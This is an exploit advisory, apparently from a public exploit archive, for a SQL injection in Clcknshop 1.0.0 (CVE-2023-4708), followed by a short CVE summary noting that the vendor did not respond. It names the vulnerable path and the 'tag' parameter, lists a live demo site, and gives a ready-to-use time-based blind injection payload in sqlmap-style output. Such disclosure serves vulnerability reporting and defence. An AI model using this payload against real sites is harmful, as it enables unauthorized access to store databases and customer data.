Headline
Clcknshop 1.0.0 SQL Injection
Clcknshop version 1.0.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: Clcknshop 1.0.0 - SQL Injection# Exploit Author: CraCkEr# Date: 16/08/2023# Vendor: Infosoftbd Solutions# Vendor Homepage: https://infosoftbd.com/# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/# Demo: https://kidszone.clckn.shop/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4708# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /collection/allGET parameter 'tag' is vulnerable to SQL Injectionhttps://website/collection/all?tag=[SQLi]---Parameter: tag (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z---[-] DoneRelated news
CVE-2023-4708
A vulnerability was found in Infosoftbd Clcknshop 1.0.0. It has been rated as critical. This issue affects some unknown processing of the file /collection/all of the component GET Parameter Handler. The manipulation of the argument tag leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-238571. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.